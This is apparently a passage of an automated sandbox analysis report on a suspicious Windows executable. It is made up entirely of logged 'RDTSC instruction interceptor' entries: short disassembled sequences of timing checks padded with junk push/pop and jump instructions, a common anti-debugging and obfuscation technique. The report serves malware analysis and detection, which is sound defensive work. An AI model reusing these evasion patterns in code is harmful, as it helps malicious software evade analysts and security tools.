                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F9B second address: A77FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 mov edi, dword ptr [ebp+122D59E8h] 0x0000000e nop 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78055 second address: A78072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78072 second address: A7808B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B6085h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A782FD second address: A78343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D39A9h] 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F0E6551CA38h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+12450F18h] 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0E6551CA3Eh 0x0000003b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78343 second address: A78349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78349 second address: A7834D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A786E1 second address: A786EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A787F1 second address: A787FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0E6551CA36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78A36 second address: A78A8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0E647B6087h 0x0000000e jnc 00007F0E647B6078h 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007F0E647B6085h 0x0000001b lea eax, dword ptr [ebp+1248C4D4h] 0x00000021 jmp 00007F0E647B607Ch 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78A8C second address: A59B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA41h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jno 00007F0E6551CA36h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 jns 00007F0E6551CA54h 0x0000001c nop 0x0000001d mov edi, dword ptr [ebp+122D20C7h] 0x00000023 call dword ptr [ebp+122D306Dh] 0x00000029 jnp 00007F0E6551CA4Ah 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9ADA second address: AB9AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F0E647B6076h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C37 second address: AB9C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C49 second address: AB9C57 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E647B6076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C57 second address: AB9C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C5B second address: AB9C65 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E647B6076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9DE6 second address: AB9DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA45h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9DFF second address: AB9E3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E647B6084h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0E647B6090h 0x00000014 jmp 00007F0E647B6088h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC767 second address: ABC76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF941 second address: ABF94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF94A second address: ABF950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF950 second address: ABF954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF954 second address: ABF958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF958 second address: ABF95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF95E second address: ABF964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF1C8 second address: ABF1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF1D0 second address: ABF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF1D4 second address: ABF1E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E647B6076h 0x00000008 ja 00007F0E647B6076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF1E4 second address: ABF206 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E6551CA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF607 second address: ABF611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E647B6076h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF611 second address: ABF615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A383FA second address: A383FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6044 second address: AC6067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Ch 0x00000007 pushad 0x00000008 jmp 00007F0E6551CA42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC61BE second address: AC61C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E647B6076h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC61C8 second address: AC61CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC61CC second address: AC61D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC61D8 second address: AC621B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0E6551CA36h 0x00000009 jmp 00007F0E6551CA49h 0x0000000e jmp 00007F0E6551CA48h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC621B second address: AC6240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6087h 0x00000007 ja 00007F0E647B6076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6240 second address: AC624A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E6551CA36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC624A second address: AC6250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6250 second address: AC6274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA48h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F0E6551CA36h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6274 second address: AC627A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC652E second address: AC6532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6532 second address: AC6536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8EE6 second address: AC8F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E6551CA3Bh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jng 00007F0E6551CA50h 0x00000014 jmp 00007F0E6551CA3Bh 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC90CC second address: AC90D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0E647B6076h 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC90D8 second address: AC90E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9225 second address: AC922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC922D second address: AC9236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9236 second address: AC9240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E647B6076h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD7EF second address: ACD809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA46h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD809 second address: ACD81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDC03 second address: ACDC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDC07 second address: ACDC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDC0D second address: ACDC18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F0E6551CA36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A785CF second address: A785F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E647B607Ah 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007F0E647B607Ch 0x00000014 js 00007F0E647B6076h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDDB4 second address: ACDDB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDDB9 second address: ACDDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDF3F second address: ACDF45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDF45 second address: ACDF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDF49 second address: ACDF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE992 second address: ACE9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B607Bh 0x00000009 jmp 00007F0E647B6087h 0x0000000e popad 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE9B9 second address: ACE9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0E6551CA36h 0x0000000a jmp 00007F0E6551CA44h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD3BA2 second address: AD3BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4061 second address: AD408C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0E6551CA3Dh 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jmp 00007F0E6551CA3Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F0E6551CA36h 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD432E second address: AD4334 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4334 second address: AD4357 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0E6551CA38h 0x00000010 pushad 0x00000011 jmp 00007F0E6551CA3Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4357 second address: AD435D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD435D second address: AD4362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4362 second address: AD4368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4368 second address: AD436C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD436C second address: AD4372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4372 second address: AD437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD4660 second address: AD468C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F0E647B6078h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F0E647B607Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD468C second address: AD4697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5425 second address: AD542B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD542B second address: AD543A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0E6551CA36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD543A second address: AD5440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5440 second address: AD544A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD544A second address: AD5468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B6084h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA3B1 second address: ADA3B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA3B5 second address: ADA3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E647B6076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA3C1 second address: ADA3C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9605 second address: AD9609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD98C3 second address: AD98C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD98C8 second address: AD98CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD98CE second address: AD98D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD98D6 second address: AD98DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9BA6 second address: AD9BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9BB0 second address: AD9BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9BB6 second address: AD9BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E6551CA40h 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA01D second address: ADA021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA021 second address: ADA06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0E6551CA3Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 je 00007F0E6551CA36h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 jne 00007F0E6551CA50h 0x00000026 push edx 0x00000027 jl 00007F0E6551CA36h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE73EB second address: AE73F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5CAD second address: AE5CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5F9B second address: AE5FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B607Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5FB3 second address: AE5FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5FB7 second address: AE5FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5FBB second address: AE5FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
